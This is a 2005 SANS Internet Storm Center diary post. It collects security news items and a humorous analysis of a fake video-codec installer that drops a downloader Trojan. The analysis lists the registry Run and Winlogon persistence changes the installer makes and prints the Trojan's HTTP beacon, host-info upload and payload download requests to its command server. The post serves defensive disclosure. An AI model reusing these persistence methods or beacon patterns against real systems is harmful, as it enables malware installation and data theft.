Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-07-13 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

A question; New MSBA; Finding zlib; Evading Snort; Some Reading; FTBM VI: Hypnotized and EULAgized

Published: 2005-07-13
Last Updated: 2005-07-14 03:33:23 UTC
by Tom Liston (Version: 1)
0 comment(s)

A Question:



Anyone having problems with July MS patches? We?ve had scattered reports of issues. Let us know.

New Version of MBSA



Microsoft Baseline Security Analyzer (MBSA) 2.0 is available



Info: http://support.microsoft.com/?scid=kb;en-us;895660



Download: http://www.microsoft.com/technet/security/tools/mbsahome.mspx



Also, in case you missed it, there is new functionality that allows you to update other MS products (MS Office, etc...) using Windows Update. Check out the Windows Update web page for details:



http://windowsupdate.microsoft.com/



(Thanks Peter!)

Finding Vulnerable zlib Executables



When something like the recently announced zlib issues (http://isc.sans.org/diary.php?date=2005-07-10) becomes public, you?re always told that it is imperative that you patch executables that have been statically linked with vulnerable versions of the library. But how the heck do you find them? In a really cool display of out-of-the-box thinking, Florian Weimer has come up with a way to put the Open Source AV scanner, ClamAV to work finding statically linked vulnerable versions of zlib.



http://www.enyo.de/fw/security/zlib-fingerprint/



(Thanks Erik)

Possible Evasion in Snort Multi-Pattern Algorithm



There appears to be a problem with the default multi-pattern matching algorithm in the current release version of Snort that could allow attackers to evade detection. The suggested workaround (until Snort 2.4, with a different MP algorithm becomes available) is to update your Snort configuration with:



config detection: search-method ac




(Thanks Bill)

Interesting Reading:



ICANN Suggestions to Protect Your Domain



ICANN's Security and Stability Advisory Committee has outlined several famous and recent thefts of websites, including Panix.com, Hushmail.com and HZ.com, and listed where the system went wrong and what can be done to correct the flaws. It has made 10 findings and, in response, 10 recommendations for how the internet industry and consumers themselves can make sure that people don't steal their online property.



http://www.icann.org/announcements/hijacking-report-12jul05.pdf



(Thanks, Pat!)

Mules: The Other End of the Phishing Line



Every day, we play whack-a-mole with phishers, Trojans, and scams. This story from USA Today talks about what goes on at the far end of the phishing line from what we see. Interesting stuff.



http://www.usatoday.com/money/industries/technology/2005-07-10-cyber-mules-cover_x.htm

Follow the Bouncing Malware VI: Hypnotized and EULAgized



Prelude



Before we begin this lil? walk on the wild side, I want to make sure we get some things straight right up front:



1) We?re going to be talking about the seamier side of the Internet today, including sites which specialize in displaying photos and videos of poverty-stricken, 20-something men and women who obviously can?t afford clothing. Oftentimes, these young men and women seem to be more than a bit "chummy" with each other as well. If you are offended by such things, please be assured that I will put forth my usual effort to maintain the dignity and decorum of the Handler?s Diary, which is to say "none." Muddle through with us anyway, and you?ll probably find that there is far more here to reinforce your disappointment in humanity than a few "candid" photos.



2) Praise, kudos, and large-denomination currency can be directed to me. Vitriolic complaints should be directed to my fellow handler, Cory Altheide (caltheide at isc.sans.org), who, this past February 2nd, used this space for a literary depiction of me standing in for Punxsutawney Phil, the world famous groundhog.



Why yes, I do hold a grudge.



3) Sweetheart... when you caught me looking at "those" sites, I really *was* doing research... see? Hello? Hello?

The Set-Up



It was a dark and stormy night (sorry, I always wanted to start a story that way...) and Joe Sixpack, our intrepid hero, was browsing the ?net, looking for something that, in the interest of decorum and not setting off "nanny filters," I can?t mention. Let?s just say that it sounds a lot like the word "thorn," and leave it at that.



Joe was looking for something different. Not wildly different, mind you?nothing on the order of... uh... let?s say "animal husbandry," but something more than just the regular old... umm... anatomical studies. Joe wanted some *action*. Perhaps if he could find some video footage of legal-aged (for while Joe may be a pervert, he has some standards...) ladies and gentlemen... er... consummating their acquaintance, that would be good.



The Round-Up



Like most of your average, everyday letches, Joe heads on over to Google and does a bit o? searching. If it?s worth finding on the Internet (and even if it ain?t), Google is the place to go. If you?ve never searched for a... uh... "thorn-related" word on Google, you?ll be awfully surprised at the shear volume of responses that you receive. One time, I was legitimately searching for a specific type of those, small, threaded fasteners... let?s just say that it was a bit difficult to separate a tiny amount of wheat from a big ol? truck-load of chaff. But, I digress...



In any case, a little bit of searching, leads Joe an appropriate, inappropriate site.

The Hook



"Yes!" Joe says silently, as he peruses the listing of the various forms of "entertainment" that his new-found site has to offer.



What a selection it is: photos and videos of all kinds of things-- things that Joe has never even heard of. Things that would make a longshoreman blush. Men, women, birds, beasts, and devices in combinations and permutations that make an episode of Jerry Springer look like a church picnic.



Joe is in his element. He scrolls up and down the screen, looking at the listing and seeing all kinds of stuff he wants to check out. Finally, he can?t help but click on a link to one of the steamier video feeds.

The Double-Cross



But instead of watching his screen fill with undulating bodies, Joe is disappointed when the following message pops up:



"To play new format video files correctly you need to download free video codec
update (9Kb) Click here. Free codecs provided by www.vcodec.com"



(Note: Standard "Follow the Bouncing Malware" rules apply here. The link above is non-clickable for a reason: you really, REALLY shouldn?t go there. I may joke around about a lot of stuff, but not that. Don?t do it.)



Joe, being Joe, has heard something about "codecs" before. He vaguely recalls something about them being used in Windows Media Player. He is actually pretty proud of himself when he remembers that the name "codec" is a portmanteau word created from the two functions that a codec serves: COmpression and DECompression. Maybe he?s finally getting the hang of this computer stuff after all.

The Tale



Joe surfs to the VCodec site and is pleased when he sees a whole lot of information that, although he doesn?t understand it all, seems to confirm what he remembered. Yes, this "codec" thingie has something to do with compressed video.



"VCodec 1.47 FREE - New revolutionary video standard



VCodec includes a suite of powerful encoding tools enabling the highest levels of visual quality, compression and control. It plugs into your video software to produce high-quality movies (at one-tenth the size of a DVD) for viewing on your PC."

The Wire



Following that was an impressive list of "Technical Specifications" filled with technical sounding words like "Integrated Encoding Tools," "Bitrates," "Quantization," "De-interlacing" and something called "block motion compensation." It all sounded way too technical, but if he needed it to see what he needed to see, well, then, he needed it. (Say that ten time fast...) Besides, the site was very impressive and very professional looking. What could go wrong?



The Shut-Out



Joe was about ready to download the file, but there was something nagging at the back of his thoughts. Just before he clicked on the download link, it finally dawned on him: something is wrong. Back on the web page of his newest favorite site, there was a link that had said something about a "NEW updated version 3.5," and here, the VCodec site was only offering him version 1.47. What was going on?



He hadn?t clicked on the download link on that page, because he had heard that these... uh... "thornography" sites weren?t always on the up-and-up. But now, his curiosity was piqued.



Joe quickly clicked back to the video smorgasbord and carefully examined the direct download link found there. With a jaundiced eye, he looked carefully at what was displayed by his browser to make sure that the link was actually taking him to the VCodec site. It was! Ha! They weren?t going to fool him. He was going to download the new, updated version of the codec. Version 3.5 had to be way better than version 1.47.

The Sting



Joe downloaded the file and installed it. It was all very professional. First, a window popped up, explaining that the executable was going to install the VCodec software, and giving him the option to cancel the installation. Then, he was presented with one of those End User License Agreements (EULA) and was forced to agree with it if he wanted to install the software. Joe always hated that, but he did it anyway... he sort of felt hypnotized by the thought of what he would be seeing when that DVD quality video was dancing across his screen...

The Big Con



The file that Joe downloaded was "vc3_05b.exe," a 16,373 byte long executable. On the VCodec site, there is also a file called "vc1_05a.exe" (9341 bytes) which is what you get if you follow the main "download" link on the VCodec site. Also, like an extra surprise, hidden on the vcodec.com index page is some JavaScript that attempts, in several ways, to download the file "vc105a.htm" which is simply a copy of vc1_05a.exe. Both files are packed with the executable compressor FSG, and while they are superficially different, running either of them has the same result: version 3.5 just has a dog-and-pony show to go along with it.



Perhaps by now, you?ve gotten the idea that we?re not dealing with a plain old video codec here. After all, this *is* another installment of "Follow the Bouncing Malware." Well, no, it isn?t just a codec.



In fact, it isn?t a codec at all.



FSG, although it is a pain in the backside, isn?t really too much of an obstacle if you know what you?re doing. Un-packing vc3_05b.exe takes a little doing, but when you finally crack it open, it reveals plenty. Our buddy vc3_05b.exe has precious little to do with video compression, and much more to do with dropping an executable "gift" on your computer and then messing with the registry to automatically run it.



It adds two keys to the registry:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\explorer\run



It adds the following values:



HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\uuid:
"8dffcee8-49e4-443d-8606-b0502d81421f"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies

\explorer\run\notepad.exe: "msmsgs.exe"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RegSvr32:

"C:\WINDOWS\System32\msmsgs.exe"



It modifies these values:



HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
"Explorer.exe" becomes

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell:
"Explorer.exe, msmsgs.exe"



Finally (if you?re following closely, you?ve seen this one coming), it drops the file:



C:\WINDOWS\System32\msmsgs.exe



The interesting thing about vc3_05b.exe is the little show that it gives us along the way, in order to make us think that everything is legitimate and above board. Joe saw it all: a confirmation "This will install Vcodec ver 3.15. Do you wish to continue?" dialog box, and an official looking EULA signoff. The funny thing is, it all doesn?t amount to a hill of beans.



It doesn?t matter how you answer any of their questions, your system is getting whacked while you?re watching the show.



If you say you don?t want to install their software, they install their software.



If you tell them to shove their EULA where the sun don?t shine, you?re still getting msmsgs.exe installed.



Heck, if you cancel the install, it even warns you: "Setup is not complete. If you quit the setup program now, the program will not be installed. Are you sure?" And then it installs msmsgs.exe anyway.



Lovely. Pond-scum with a sense of humor.



So, what is msmsgs.exe? Is it a video codec?



Sure it is...



...and I?m the Pope.



Setting aside (for now) the possibility of a Thomas the First papacy, it turns out that msmsgs.exe is actually just a nasty little downloader Trojan. It injects itself into Windows Explorer and then contacts the site "fhgstr.com":



GET /ping.php HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



If the fhgstr.com site replies with the ever-popular phrase:



0b723718-9389-4ca8-86f4-632a4bbc88a4



msmsgs.exe switches into "blabbermouth" mode and spills it?s guts:



GET /info.php?land=1033&uuid=7c75xb3b-955d-42ad-9xdf-17da5x645c0e

&id=192.168.74.128&osl=English%20(United%20States) HTTP/1.1

User-Agent: blia, nu i v sad

Host: fhgstr.com

Cache-Control: no-cache



telling the folks back home several interesting facts about its host. Not to be outdone in the blathering-gibberish department, fhgstr.com comes bouncing back (pun intended) with a rousing chorus of:



6e

M7081700.so|K7111600.so|DA7021900.so|X7081700.so|Z7121900.so|A6291400.so

|HP7081700.so|P7091300.so|S7081700.so

0



To the untrained eye, that might just look like gobbledygook, and indeed, that?s pretty much what it looked like to me. However, with a little bit of prodding, and tossing it the correct types of messages in the lab, msmsgs.exe knew *exactly* what to do, and proceeded to try to grab nine files with requests like the following:



GET /downloadex.php?file=M7081700.so&land=1033 HTTP/1.1

User-Agent: 029dn-2c-02cn-4n0238-402cn8304c=1-n234c-192=3-12-0jd0912093712-4917b-2c0812308b1c2038

Host: fhgstr.com

Cache-Control: no-cache



(Note: Just in case you?ve not figured it out yet, working through what these little critters do is a somewhat painstaking combination of disassembly, debugging, and behavioral analysis under lab conditions. This isn?t something that you should ever try, unless you really know what you?re doing. If you mess up, you can end up infecting non-laboratory machines? not that *I* would ever do that, mind you, but I... uh... umm... know of people who have.)



So, what presents are waiting for us when msmsgs.exe gets done with its downloads? You?ll have to wait until next week, when I?m on duty again for the next FTBM...



Here?s a hint though: at the tail end of VCodec?s EULA, there is this little gem:



"ADDENDUM: By accepting this agreement you also accept installing of free software helping you surf the web easily and get useful information in single click"



Setting aside for a moment the fact that their entire EULA looks like a really bad cut-n-paste job, why oh why can?t these people put together a decent sentence?



Another butt-covering bite o? EULA:



"In return for the right to access this Content, you acknowledge and agree that the Software contains additional software products provided to SOFTREV by its suppliers which will periodically deliver additional Content such as, but not limited to, advertisements and promotional messages to your computer



Updates to Software.



The Software includes an automatic update feature to ensure that you have the most recently released version. You acknowledge and agree that SOFTREV or third parties designated by SOFTREV may from time to time provide automatic programming fixes, updates and upgrades to the Software (collectively, the Updates). Updates may include installation of third party applications, through automatic electronic dissemination and other means. You consent to such Updates and agree that the terms and conditions of this Agreement will apply to all such Updates. If you should elect not to have your software updated at any future time, SOFTREV shall not be responsible for any incompatibilities that may arise on your system and Computer."



Finally, I may not be able to write the next installment, because it appears that I might have, perhaps, somehow, inadvertently, without forethought or malice, accidentally, in some way (probably while under the influence of caffeine ? so it?s not really my fault) violated VCodec?s EULA... especially the part that says I?m not allowed to reverse engineer their "product."



Oops... sorry ?bout that.



Hmmm... I?ll make them a deal: when they actually have a product, I won?t reverse engineer it.


-----------------------------------------------------------------

Handler on Duty: Tom Liston (tom at intelguardians dot com)
http://www.intelguardians.com
Keywords:
0 comment(s)
Diary Archives